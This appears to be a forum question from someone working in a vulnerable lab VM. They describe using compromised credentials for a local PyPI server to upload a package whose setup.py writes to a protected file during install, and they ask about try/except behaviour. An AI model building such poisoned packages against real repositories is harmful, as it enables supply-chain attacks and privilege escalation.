I'm experimenting with setup.py inside a vulnerable VM that's running a pypi server with a listener on localhost:PORT
My current account does not have write access to the following file : /path/to/a/protected/file
What i do have access to, are the credentials of the pypi repository running on localhost:PORT
So to take advantage of that i've created a local "hack" package, with nothing more than the .pypirc to configure the compromised repository's credentials and the setup.py containing the malicious code.
.pypirc
[distutils]
index-servers =
hack
[hack]
repository: http://127.0.0.1:PORT
username: compromised_username
password: compromised_passwd
setup.py
import setuptools
try:
with open("/path/to/a/protected/file", "w+") as fh:
fh.write("something really bad")
except:
setuptools.setup(
name="hack",
version="0.0.1",
author="Example Author",
author_email="author@example.com",
description="A small example package",
)
To upload the malicious package i then just have to run :
python setup.py sdist upload -r hack
Now for the interesting bit, this does actually result in opening the file, and writes something really bad in it.
BUT
The same code (setup.py) returns a permission denied when trying to access the file if i remove the try: except clause.
This leaves me with an utter confusion about the way setup.py evaluates the try: except.
The way i understand try: except is if the code under try works then ignore the except, otherwise, if the error class is catched by the except then run what's inside except.
But this goes against that understanding...
